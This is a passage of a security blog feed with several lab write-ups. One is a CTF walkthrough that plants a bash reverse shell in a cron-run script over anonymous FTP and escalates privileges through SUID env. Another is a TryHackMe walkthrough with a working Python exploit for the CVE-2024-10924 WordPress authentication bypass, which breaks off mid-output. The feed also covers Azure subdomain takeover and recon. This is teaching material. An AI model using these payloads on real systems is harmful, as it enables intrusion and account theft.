<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1746364427298/1ff56f7e-9d51-439b-a2ae-84e9b844890b.jpeg" alt class="image--center mx-auto" /></p>
<p>turns out they were just ordinary dog images</p>
<ol>
<li>There's a share on the user's computer.  What's it called?<br /> <code>pics</code></li>
</ol>
<p>Now we need to get a user shell, so I checked whether FTP was open to anonymous login</p>
<pre><code class="lang-plaintext">▶ ftp &lt;ip&gt; 21
Connected to 10.10.228.4.
220 NamelessOne's FTP Server!
Name (&lt;ip&gt;:berzi): anonymous

331 Please specify the password.
Password: 
230 Login successful.
</code></pre>
<p>There was only the <code>scripts</code> directory</p>
<pre><code class="lang-plaintext">ftp&gt; ls
229 Entering Extended Passive Mode (|||49675|)
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000           55 May 04 12:02 clean.sh
-rw-rw-r--    1 1000     1000         3698 May 04 10:58 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.
</code></pre>
<p>The <code>clean.sh</code> file seemed to be run by a cronjob, so I wrote a reverse shell script and replaced the original with it.</p>
<pre><code class="lang-plaintext">▶ cat clean.sh 
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" &gt;&gt; /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE &amp;&amp; echo "$(date) | Removed file /tmp/$LINE" &gt;&gt; /var/ftp/scripts/removed_files.log;done
fi
</code></pre>
<p>Here’s the modified script (note that the IP here is the attacker machine’s, not the target’s)</p>
<pre><code class="lang-plaintext">▶ cat clean.sh 
#!/bin/bash
bash -i &gt;&amp; /dev/tcp/"&lt;ip&gt;"/1337 0&gt;&amp;1
</code></pre>
<p>I opened a netcat listener on my attacker machine with <code>nc -lvp 1337</code> and uploaded the modified script to the target</p>
<pre><code class="lang-plaintext">ftp&gt; put clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||64918|)
150 Ok to send data.
100% |*********************************************************************|    41      444.87 KiB/s    00:00 ETA
226 Transfer complete.
41 bytes sent in 00:00 (0.07 KiB/s)


ftp&gt; bash clean.sh
?Invalid command.
</code></pre>
<p>Once the cronjob on the target executed the modified script, I got a shell on my attacker machine. The <code>user.txt</code> was right in the directory I landed in.</p>
<ol>
<li><p>user.txt</p>
<p> <code>90d6f992585815ff991e68748c414740</code></p>
</li>
</ol>
<p>I checked for files with the SUID bit set.</p>
<pre><code class="lang-plaintext">find / -perm -u=s -type f 2&gt;/dev/null
</code></pre>
<p>Among the output I found quite a few candidates, but <code>/usr/bin/env</code> worked for me. I ran this:</p>
<pre><code class="lang-plaintext">namelessone@anonymous.com:~$ env /bin/sh -p
# cd /root
# cat root.txt
4d930091c31a622a7ed10f27999af363
</code></pre>
<ol>
<li>root.txt<br /> <code>4d930091c31a622a7ed10f27999af363</code></li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Azure's defense against Subdomain takeover]]></title><description><![CDATA[How exactly does a subdomain takeover occur?

basically it is when what we have a dangling DNS record for an Azure resource (a VM or a Web app). When the Azure resource is deleted, the corresponding CNAME record stays. The attacker can find the respe...]]></description><link>https://blog.berzi.one/azures-defense-against-subdomain-takeover</link><guid isPermaLink="true">https://blog.berzi.one/azures-defense-against-subdomain-takeover</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Thu, 20 Mar 2025 13:22:55 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767961463333/280f5172-5476-4d08-af7d-7e9152e484b1.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-how-exactly-does-a-subdomain-takeover-occur">How exactly does a subdomain takeover occur?</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1741761441732/10f0f9e6-83e0-4c74-a908-399e2329aff5.png" alt class="image--center mx-auto" /></p>
<p>Basically, it occurs when we have a dangling DNS record for an Azure resource (a VM or a web app): when the Azure resource is deleted, the corresponding CNAME record stays behind. An attacker can find the respective subdomain, create the same resource under the same name with their own Azure account, and take control of the subdomain associated with it.</p>
<p>Here’s a simple <code>dig</code> check to see the CNAME record of an example site</p>
<pre><code class="lang-plaintext">dig testing.forsubdomain.takeover

; &lt;&lt;&gt;&gt; DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu &lt;&lt;&gt;&gt; testing.forsubdomain.takeover
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: xxxxxx
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 65494
;; QUESTION SECTION:
;testing.forsubdomain.takeover.        IN    A

;; ANSWER SECTION:
testing.forsubdomain.takeover.    3600    IN    CNAME    example.azurewebsites.net.

;; Query time: 332 msec
;; SERVER: 127.0.0.53#53(127.0.0.53) (UDP)
;; WHEN: Wed Mar 12 01:27:59 IST 2025
;; MSG SIZE  rcvd: 221
</code></pre>
<p>Now that you’ve run the dig lookup, it’s time to check whether the target service is theoretically vulnerable; see <a target="_blank" href="https://github.com/EdOverflow/can-i-take-over-xyz/issues/35">https://github.com/EdOverflow/can-i-take-over-xyz/issues/35</a> for the list of services and the DNS-record fingerprints that indicate vulnerability.</p>
<p>Azure’s last line of defense lies in its domain validation feature. Let’s talk about this further.</p>
<p>When we visit the site mentioned in the CNAME record, we’ll get something like this, indicating the first signs of a possible takeover</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1741763324744/b9dd8df6-9dd1-4a90-9956-faa417510d23.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-azure-name-reservation-service">Azure name reservation service</h2>
<p><img src="https://learn.microsoft.com/en-us/azure/app-service/media/app-service-web-tutorial-custom-domain/add-custom-domain.png" alt="A screenshot showing how to open the Add custom domain dialog." /></p>
<p>One of Azure's primary defenses against subdomain takeover is the Name Reservation Service, which is automatically enabled for App Service resources. This service implements a critical security control: upon deletion of an App Service app or App Service Environment (ASE), immediate reuse of the corresponding DNS name is forbidden for every subscription except those belonging to the tenant that originally owned it. This means an attacker cannot re-create the resource under the same name to perform the takeover for a while.</p>
<p>How does this happen now? Onto the next cool concept!</p>
<h2 id="heading-domain-verification-tokens-and-txt-records">Domain verification tokens and TXT records</h2>
<p>For example, if you own forsubdomain.takeover and want to add it as a custom domain to an Azure App Service, you would need to create a TXT record with the name "asuid.forsubdomain.takeover" and a value containing the verification ID provided by Azure, which typically looks like "5975973A85973A812AC2AC3A855973A812AC973A812AC12AC". This is a DVT (domain verification token).</p>
<h2 id="heading-the-domain-validation-process">The Domain Validation Process</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1741763178007/380a97fb-2b97-4d19-961e-433f4cb886bf.png" alt class="image--center mx-auto" /></p>
<p>The domain validation process in Azure follows a structured workflow designed to ensure secure domain configuration. When adding a custom domain to an Azure App Service, the platform guides users through a validation procedure that requires two critical DNS records:</p>
<ol>
<li><p>A domain mapping record: Either an A record (for root domains) that points to the app's IP address or a CNAME record (for subdomains) that points to the app's default domain name</p>
</li>
<li><p>A verification TXT record: an <code>asuid</code>-prefixed TXT record (e.g. asuid.forsubdomain.takeover) containing the domain verification ID</p>
</li>
</ol>
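<p>For the earlier forsubdomain.takeover example, the two records would look like this in zone-file form (all values are placeholders):</p>
<pre><code class="lang-plaintext">; 1. domain mapping: point the subdomain at the app's default hostname
testing.forsubdomain.takeover.        3600  IN  CNAME  example.azurewebsites.net.

; 2. ownership proof: the asuid TXT record carrying the verification ID
asuid.testing.forsubdomain.takeover.  3600  IN  TXT    "5975973A85973A812AC2AC3A855973A812AC973A812AC12AC"
</code></pre>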
<p>After adding these records with your domain provider, Azure's validation process verifies both records exist and are correctly configured. The platform provides a user-friendly interface that displays green check marks next to both domain records when they are properly set up. Only after successful validation will Azure allow the custom domain to be added to the service.</p>
<h2 id="heading-services-implementing-this-defense">Services implementing this defense</h2>
<ul>
<li><p>App Service</p>
</li>
<li><p>Container Apps</p>
</li>
<li><p>Traffic Manager</p>
</li>
<li><p>Azure CDN</p>
</li>
<li><p>CloudApp</p>
</li>
<li><p>Virtual Machines</p>
</li>
<li><p>Blob Storage</p>
</li>
</ul>
<h2 id="heading-references">References</h2>
<ul>
<li><p>Azure docs: <a target="_blank" href="https://learn.microsoft.com/en-us/azure/?product=popular">https://learn.microsoft.com/en-us/azure/</a></p>
</li>
<li><p>can-i-take-over-xyz repo <a target="_blank" href="https://github.com/EdOverflow/can-i-take-over-xyz/issues/35">https://github.com/EdOverflow/can-i-take-over-xyz</a></p>
</li>
<li><p>dig lookup tool <a target="_blank" href="https://toolbox.googleapps.com/apps/dig/#A/">https://toolbox.googleapps.com/apps/dig</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[eJPT-CTF-1: Assessment Methodologies: Information Gathering CTF 1]]></title><description><![CDATA[This lab focuses on information gathering and reconnaissance techniques to analyze a target website. Participants will explore various aspects of the website to uncover potential vulnerabilities, sensitive files, and misconfigurations. By leveraging ...]]></description><link>https://blog.berzi.one/ejpt-ctf-1-assessment-methodologies-information-gathering-ctf-1</link><guid isPermaLink="true">https://blog.berzi.one/ejpt-ctf-1-assessment-methodologies-information-gathering-ctf-1</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Wed, 12 Feb 2025 21:34:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767961420248/c0f53216-934b-410a-8d24-08a45c93b713.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>This lab focuses on information gathering and reconnaissance techniques to analyze a target website. Participants will explore various aspects of the website to uncover potential vulnerabilities, sensitive files, and misconfigurations. By leveraging investigative skills, they will learn how to identify critical information that could assist in further penetration testing or exploitation.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">the machine is within a private network, so you can’t use online enumeration tools like sublist3r or theHarvester. I therefore used the following tools: gobuster, nmap, and curl</div>
</div>

<h1 id="heading-lab-environment">Lab Environment</h1>
<p>A website is accessible at <a target="_blank" href="http://target.ine.local"><strong>http://target.ine.local</strong></a>. Perform reconnaissance and capture the following flags.</p>
<ul>
<li><p><strong>Flag 1:</strong> This tells search engines what to crawl and what to avoid.</p>
</li>
<li><p><strong>Flag 2:</strong> What website is running on the target, and what is its version?</p>
</li>
<li><p><strong>Flag 3:</strong> Directory browsing might reveal where files are stored.</p>
</li>
<li><p><strong>Flag 4:</strong> An overlooked backup file in the webroot can be problematic if it reveals sensitive configuration details.</p>
</li>
<li><p><strong>Flag 5:</strong> Certain files may reveal something interesting when mirrored.</p>
</li>
</ul>
<h1 id="heading-tools">Tools</h1>
<ul>
<li><p>Firefox</p>
</li>
<li><p>Curl</p>
</li>
<li><p>HTTrack</p>
</li>
</ul>
<hr />
<h3 id="heading-note">Note</h3>
<p>In this lab, the flag will follow the format: FLAG1{MD5Hash} OR FL@G1{MD5Hash}. For example, FLAG1{0f4d0db3668dd58cabb9eb409657eaa8}. You need to submit only the MD5 hash string, excluding the braces. For instance: 0f4d0db3668dd58cabb9eb409657eaa8.</p>
<p>This tells search engines what to crawl and what to avoid.<br />visit: <code>target.ine.local/robots.txt</code></p>
<p>What website is running on the target, and what is its version?</p>
<p><code>nmap -sC target.ine.local</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1739395436796/c6b31990-80f0-4e72-9a6c-773f0b54a605.png" alt class="image--center mx-auto" /></p>
<p>Directory browsing might reveal where files are stored.</p>
<p>The stack is WordPress on Apache, so look up WordPress directories that commonly have listing enabled. Here’s a list:</p>
<ul>
<li><p><a target="_blank" href="http://target-site.com/wp-content/uploads/"><code>http://target-site.com/wp-content/uploads/</code></a></p>
</li>
<li><p><a target="_blank" href="http://target-site.com/wp-includes/"><code>http://target-site.com/wp-includes/</code></a></p>
</li>
<li><p><a target="_blank" href="http://target-site.com/wp-content/plugins/"><code>http://target-site.com/wp-content/plugins/</code></a></p>
</li>
<li><p><a target="_blank" href="http://target-site.com/wp-content/themes/"><code>http://target-site.com/wp-content/themes/</code></a></p>
</li>
</ul>
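<p>The candidate URLs above can be generated and checked systematically. A small offline sketch (helper names are my own) builds the URLs for the lab target and shows the test to apply to each response body; fetch the URLs with curl or a browser:</p>

```python
# Common WordPress paths that may have directory listing enabled
# (paths taken from the list above; base URL is the lab target).
CANDIDATE_PATHS = [
    "/wp-content/uploads/",
    "/wp-includes/",
    "/wp-content/plugins/",
    "/wp-content/themes/",
]

def listing_urls(base):
    return [base.rstrip("/") + path for path in CANDIDATE_PATHS]

def looks_like_listing(html):
    # Apache's auto-generated index pages contain an "Index of <dir>" title
    return "Index of" in html

for url in listing_urls("http://target.ine.local"):
    print(url)
```

<p>Run each printed URL through <code>curl</code> and apply <code>looks_like_listing</code> to the body; any hit means browsing is enabled for that directory.</p>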
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1739395543552/6d793f95-0bb0-44e3-ab6f-708bdd21b101.png" alt class="image--center mx-auto" /></p>
<p>An overlooked backup file in the webroot can be problematic if it reveals sensitive configuration details.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1739395603312/7d923759-60bd-4d3a-83c9-693a88ee0676.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1739395653800/cd2a818e-6e09-4d62-8ef5-05e7e3e09bfe.png" alt class="image--center mx-auto" /></p>
<p>Certain files may reveal something interesting when mirrored.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1739395845093/6e28d294-47a4-42c5-b9a6-da54fb1479a4.png" alt class="image--center mx-auto" /></p>
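<p>After mirroring the site with HTTrack, you can grep the downloaded files for the flag format given in the note earlier. A small regex sketch (the pattern is derived from the stated FLAG1{md5} / FL@G1{md5} format, and the sample hash is the one from the note):</p>

```python
import re

# Flag format from the note above: FLAG1{MD5Hash} or FL@G1{MD5Hash}
FLAG_RE = re.compile(r"FL[A@]G\d\{[0-9a-f]{32}\}")

def find_flags(text):
    # Return every flag-shaped string found in the given text
    return FLAG_RE.findall(text)

sample = "header FLAG1{0f4d0db3668dd58cabb9eb409657eaa8} footer"
print(find_flags(sample))
```

<p>Apply <code>find_flags</code> to each mirrored file (e.g. loop over the HTTrack output directory) instead of opening them one by one.</p>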
]]></content:encoded></item><item><title><![CDATA[Bypass Really Simple Security Tryhackme Writeup/Walkthrough]]></title><description><![CDATA[WordPress is one of the most popular open-source Content Management Systems (CMS) and it is widely used to build websites ranging from blogs to e-commerce platforms. In November 2024, a critical vulnerability was discovered in the Really Simple Secur...]]></description><link>https://blog.berzi.one/bypass-really-simple-security-tryhackme-writeupwalkthrough</link><guid isPermaLink="true">https://blog.berzi.one/bypass-really-simple-security-tryhackme-writeupwalkthrough</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Tue, 04 Feb 2025 19:25:51 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767963158389/6d997437-5539-4cc5-be3a-8ec7ab486f1b.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>WordPress is one of the most popular open-source Content Management Systems (CMS) and it is widely used to build websites ranging from blogs to e-commerce platforms. In November 2024, a critical vulnerability was discovered in the <a target="_blank" href="https://really-simple-ssl.com/">Really Simple Security plugin</a>, a widely adopted security plugin used by millions of websites. The vulnerability allowed attackers to bypass authentication and gain unauthorised access to user accounts, including those with administrative privileges. Since WordPress is a CMS, gaining administrative access sometimes allows you even to perform privilege escalation and get complete control of the server/network. Discovered by István Márton from <a target="_blank" href="https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass">Wordfence</a>, this flaw was assigned a critical severity rating and CVE-ID 2024-10924.</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1737010496955.svg" alt="WordPress admin login panel with a transparent red skull as a background image." /></p>
<h2 id="heading-learning-objective">Learning Objective</h2>
<ul>
<li><p>Exploit a WordPress authentication through CVE 2024-10924</p>
</li>
<li><p>How the exploit works</p>
</li>
<li><p>Protection and mitigation measures</p>
</li>
</ul>
<h2 id="heading-room-pre-requisites">Room Pre-requisites</h2>
<p>Understanding the following topics is recommended before starting the room:</p>
<ul>
<li><p><a target="_blank" href="https://tryhackme.com/room/howwebsiteswork">How Websites Work</a></p>
</li>
<li><p><a target="_blank" href="https://tryhackme.com/room/protocolsandservers">Protocols and Servers</a></p>
</li>
<li><p><a target="_blank" href="https://tryhackme.com/r/room/webapplicationbasics">Web Application Basics</a></p>
</li>
</ul>
<h2 id="heading-connecting-to-the-machine">Connecting to the Machine</h2>
<p>You can start the virtual machine by clicking the <code>Start Machine</code> button, which will start the machine in a split-screen view. If the VM is not visible, use the blue <code>Show Split View</code> button at the top of the page. Please wait 1-2 minutes after the system boots completely to let the auto scripts run successfully.</p>
<p>Let's begin!</p>
<p>Answer the questions below</p>
<p>I can successfully connect with the machine.</p>
<p>The vulnerability in CVE-2024-10924 arises due to non-adherence to secure coding practices while handling REST API endpoints in the WordPress Really Simple Security plugin. This plugin is widely used to add additional security measures, including Two-Factor Authentication (2FA). Unfortunately, improper validation during the authentication process allows attackers to exploit API endpoints and bypass critical checks.</p>
<h2 id="heading-wordpress-entry-points">WordPress Entry Points</h2>
<p>WordPress offers various entry points for interaction:</p>
<ul>
<li><p><strong>Admin Dashboard</strong>: Used for administrative management via the <code>/wp-admin</code> endpoint. Only authenticated users with valid credentials can access this interface.</p>
</li>
<li><p><strong>Public Interface</strong>: Managed by the index.php file in the root directory, it serves content to visitors.</p>
</li>
<li><p><strong>REST API</strong>: The API provides a flexible entry point for developers to manage site data programmatically. It requires proper authentication to access sensitive resources.</p>
</li>
</ul>
<p>The CVE-2024-10924 vulnerability targets REST API endpoints configured for the plugin’s Two-Factor Authentication (2FA) mechanism. It enables attackers to bypass authentication by manipulating parameters used during API interactions. The vulnerability occurred due to insufficient validation of user-supplied values, specifically in the <code>skip_onboarding</code> feature.</p>
<h2 id="heading-how-the-vulnerability-works">How the Vulnerability Works</h2>
<p>To understand how the vulnerability works, let's have a source code review to understand the control flow through the different pages. You can review the source code in the <code>/var/www/html/wp-content/plugins/really-simple-ssl/security/wordpress/two-fa</code> folder in the attached VM. The plugin contains a PHP class called <code>Rsssl_Two_Factor_On_Board_Api</code>,  which includes the following essential methods that lead to a bypassing authentication vulnerability:</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1737010730654.svg" alt="Functions involved for triggering the vulnerability." /></p>
<ul>
<li><p><strong>skip_onboarding</strong>: Skips or manages the 2FA onboarding process for a user by validating their credentials and redirecting them after authentication. It begins by extracting parameters from the request, including <code>user_id</code>, <code>login_nonce</code>, and <code>redirect_to</code>. These parameters are then passed to the <code>check_login_and_get_user</code> function for validation. If a valid user object is returned, the method calls <code>authenticate_and_redirect</code>, redirecting the user to the <code>redirect_to</code> URL.</p>
</li>
<li><pre><code class="lang-php">      <span class="hljs-comment">/**
       * Skips the onboarding process for the user.
       *
       * <span class="hljs-doctag">@param</span> WP_REST_Request $request The REST request object.
       *
       * <span class="hljs-doctag">@return</span> WP_REST_Response The REST response object.
       */</span>

      <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">skip_onboarding</span>(<span class="hljs-params"> WP_REST_Request $request </span>): <span class="hljs-title">WP_REST_Response</span> </span>{
          $parameters = <span class="hljs-keyword">new</span> Rsssl_Request_Parameters( $request );
          <span class="hljs-comment">// As a double we check the user_id with the login nonce.</span>
          $user = <span class="hljs-keyword">$this</span>-&gt;check_login_and_get_user( (<span class="hljs-keyword">int</span>)$parameters-&gt;user_id, $parameters-&gt;login_nonce );
          <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;authenticate_and_redirect( $parameters-&gt;user_id, $parameters-&gt;redirect_to );
</code></pre>
<p>  The vulnerability lies in the <code>skip_onboarding</code> method not validating the return value of <code>check_login_and_get_user</code>. Even if the function returns null, indicating invalid credentials, the process redirects the user, granting unauthorised access. The call to <code>skip_onboarding</code> is carried out through the REST API endpoint <code>/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding</code> with POST parameters <strong>user_id</strong>, <strong>login_nonce</strong> and <strong>redirect_to</strong>. </p>
</li>
</ul>
<ul>
<li><strong>check_login_and_get_user</strong>: The <code>check_login_and_get_user</code> function is responsible for validating the <strong>user_id</strong> and <strong>login_nonce</strong>. It first checks the validity of the <strong>login_nonce</strong> using the <strong>verify_login_nonce function</strong>. If the nonce is invalid, it returns null, ensuring an authentication failure. If the nonce is valid, it retrieves the user object associated with the provided <strong>user_id</strong> and returns it.</li>
</ul>
<pre><code class="lang-php">    <span class="hljs-comment">/**
     * Verifies a login nonce, gets user by the user id, and returns an error response if any steps fail.
     *
     * <span class="hljs-doctag">@param</span> int    $user_id The user ID.
     * <span class="hljs-doctag">@param</span> string $login_nonce The login nonce.
     *
     * <span class="hljs-doctag">@return</span> WP_User|WP_REST_Response
     */</span>

    <span class="hljs-keyword">private</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">check_login_and_get_user</span>(<span class="hljs-params"> <span class="hljs-keyword">int</span> $user_id, <span class="hljs-keyword">string</span> $login_nonce </span>) </span>{
        <span class="hljs-keyword">if</span> ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
            <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> WP_REST_Response( <span class="hljs-keyword">array</span>( <span class="hljs-string">'error'</span> =&gt; <span class="hljs-string">'Invalid login nonce'</span> ), <span class="hljs-number">403</span> );
        }
</code></pre>
<p>The problem arises because <code>skip_onboarding</code> does not properly handle the null response from this function. While the function does its job of identifying invalid credentials, the calling method ignores its return value, allowing the process to continue as if the authentication was successful.</p>
<ul>
<li><strong>authenticate_and_redirect</strong>: This function redirects the user after successful authentication. It assumes that the earlier methods have already authenticated the user. It uses the <strong>user_id</strong> and <strong>redirect_to</strong> parameters to redirect the user to the desired URL.</li>
</ul>
<pre><code class="lang-php"><span class="hljs-comment">/**
     * Sets the authentication cookie and returns a success response.
     *
     * <span class="hljs-doctag">@param</span> int    $user_id The user ID.
     * <span class="hljs-doctag">@param</span> string $redirect_to The redirect URL.
     *
     * <span class="hljs-doctag">@return</span> WP_REST_Response
     */</span>

    <span class="hljs-keyword">private</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">authenticate_and_redirect</span>(<span class="hljs-params"> <span class="hljs-keyword">int</span> $user_id, <span class="hljs-keyword">string</span> $redirect_to = <span class="hljs-string">''</span> </span>): <span class="hljs-title">WP_REST_Response</span> </span>{
        <span class="hljs-comment">// Okay checked the provider now authenticate the user.</span>
        wp_set_auth_cookie( $user_id, <span class="hljs-literal">true</span> );
        <span class="hljs-comment">// Finally redirect the user to the redirect_to page or to the home page if the redirect_to is not set.</span>
        $redirect_to = $redirect_to ?: home_url();
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> WP_REST_Response( <span class="hljs-keyword">array</span>( <span class="hljs-string">'redirect_to'</span> =&gt; $redirect_to ), <span class="hljs-number">200</span> );
    }
</code></pre>
<p>However, this function is called even if authentication fails, so the attacker is seamlessly redirected to the desired page, bypassing the authentication mechanism entirely. Security flaws this severe are rarely seen in such a widely deployed plugin.</p>
<p>It is important to note that the vulnerability only works for the accounts against whom 2FA is <strong>enabled</strong>. The chain of methods reveals how improper validation leads to a critical security flaw:</p>
<ul>
<li><p>In <strong>skip_onboarding</strong>: The return value from <code>check_login_and_get_user</code> is not validated, allowing a <strong>null</strong> response to be treated as a valid user.</p>
</li>
<li><p>In <strong>check_login_and_get_user</strong>: While it correctly identifies invalid credentials, it relies on the caller to handle its return value, which does not happen.</p>
</li>
<li><p>In <strong>authenticate_and_redirect</strong>: It blindly redirects users based on the parameters passed to it, assuming they have been properly authenticated.</p>
</li>
</ul>
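<p>The flawed chain above can be condensed into a minimal Python analogue (this is an illustration of the control flow, not the plugin's actual PHP code), contrasting the vulnerable path with a fixed one that checks the return value:</p>

```python
# Python analogue of the plugin's control flow, for illustration only.
def check_login_and_get_user(user_id, login_nonce, valid_nonces):
    # Returns None on an invalid nonce, mirroring the failed-validation case.
    if valid_nonces.get(user_id) != login_nonce:
        return None
    return {"id": user_id}

def skip_onboarding_vulnerable(user_id, login_nonce, valid_nonces):
    user = check_login_and_get_user(user_id, login_nonce, valid_nonces)
    # BUG: `user` is never inspected before authenticating and redirecting.
    return "authenticated"

def skip_onboarding_fixed(user_id, login_nonce, valid_nonces):
    user = check_login_and_get_user(user_id, login_nonce, valid_nonces)
    if user is None:  # the missing check
        return "error: invalid login nonce"
    return "authenticated"

print(skip_onboarding_vulnerable(1, "bogus", {1: "real-nonce"}))  # authenticated despite a bad nonce
print(skip_onboarding_fixed(1, "bogus", {1: "real-nonce"}))       # rejected
```

<p>The one-line <code>if user is None</code> check is all that separates the vulnerable flow from a safe one, which is why the official patch centres on validating that return value.</p>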
<p>Now that we understand the concept behind the vulnerability, let's exploit it in the next task.</p>
<p>Answer the questions below</p>
<p>What is the class name that holds the important three functions discussed in the task?</p>
<p><code>Rsssl_Two_Factor_On_Board_Api</code></p>
<p>What is the function name that accepts user_id and login_nonce as arguments and validates them?</p>
<p><code>check_login_and_get_user</code></p>
<p>In this task, we will learn how to exploit CVE-2024-10924. Exploiting of this vulnerability is straightforward and involves sending a crafted POST request to the vulnerable <code>/reallysimplessl/v1/two_fa/skip_onboarding</code> endpoint. From the previous task, we learned that the endpoint accepts three key parameters: the user's ID attempting to skip 2FA onboarding, a nonce value which is not validated correctly, and the URL to redirect the user after the operation.</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1737010782706.svg" alt="Exploiting wordpress admin panel through a POST call." /></p>
<h2 id="heading-exploitation">Exploitation</h2>
<p>In the attached VM, open the browser and visit the website <a target="_blank" href="http://vulnerablewp.thm:8080/wp-admin">http://vulnerablewp.thm:8080/wp-admin</a>. We will see that the website is protected through a login panel. Our goal is to retrieve credentials against a WordPress user admin with <strong>user_id</strong> 1.</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733302763679.png" alt="Login panel in wordpress." /></p>
<p>Below is a simple Python script that sends a POST request to the vulnerable endpoint. This script extracts and displays the cookies in response to authenticate the user.</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> requests
<span class="hljs-keyword">import</span> urllib.parse
<span class="hljs-keyword">import</span> sys

<span class="hljs-keyword">if</span> len(sys.argv) != <span class="hljs-number">2</span>:
    print(<span class="hljs-string">"Usage: python exploit.py &lt;user_id&gt;"</span>)
    sys.exit(<span class="hljs-number">1</span>)

user_id = sys.argv[<span class="hljs-number">1</span>]

url = <span class="hljs-string">"http://vulnerablewp.thm:8080/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"</span>
data = {
    <span class="hljs-string">"user_id"</span>: int(user_id),  <span class="hljs-comment"># User ID from the argument</span>
    <span class="hljs-string">"login_nonce"</span>: <span class="hljs-string">"invalid_nonce"</span>,  <span class="hljs-comment"># Arbitrary value</span>
    <span class="hljs-string">"redirect_to"</span>: <span class="hljs-string">"/wp-admin/"</span>  <span class="hljs-comment"># Target redirection</span>
}

<span class="hljs-comment"># Sending the POST request</span>
response = requests.post(url, json=data)

<span class="hljs-comment"># Checking the response</span>
<span class="hljs-keyword">if</span> response.status_code == <span class="hljs-number">200</span>:
    print(<span class="hljs-string">"Request successful!\n"</span>)

    <span class="hljs-comment"># Extracting cookies</span>
    cookies = response.cookies.get_dict()
    count = <span class="hljs-number">1</span>

    <span class="hljs-keyword">for</span> name, value <span class="hljs-keyword">in</span> cookies.items():
        decoded_value = urllib.parse.unquote(value)  <span class="hljs-comment"># Decode the URL-encoded cookie value</span>
        print(<span class="hljs-string">f"Cookie <span class="hljs-subst">{count}</span>:"</span>)
        print(<span class="hljs-string">f"Cookie Name: <span class="hljs-subst">{name}</span>"</span>)
        print(<span class="hljs-string">f"Cookie Value: <span class="hljs-subst">{decoded_value}</span>\n"</span>)
        count += <span class="hljs-number">1</span>
<span class="hljs-keyword">else</span>:
    print(<span class="hljs-string">"Request failed!"</span>)
    print(<span class="hljs-string">f"Status Code: <span class="hljs-subst">{response.status_code}</span>"</span>)
    print(<span class="hljs-string">f"Response Text: <span class="hljs-subst">{response.text}</span>"</span>)
</code></pre>
<p>The above Python code is already available on the <strong>Desktop</strong> of the attached VM with the name <code>exploit.py</code>. Open the terminal and execute the script using the following command:</p>
<p>Terminal</p>
<pre><code class="lang-cpp">ubuntu@tryhackme:~/Desktop$ python3 exploit.py <span class="hljs-number">1</span>
Request successful!

Cookie <span class="hljs-number">1</span>:
Cookie Name: wordpress_logged_in_eb51341dc89ca85477118d98a618ef6f
Cookie Value: admin|<span class="hljs-number">1734510575</span>|oROXr3wB4mKDymD0koHZenGeStwYsqZbMcWqOlm4QI
Cookie <span class="hljs-number">2</span>:
Cookie Name: wordpress_eb51341dc89ca85477118d98a618ef6f
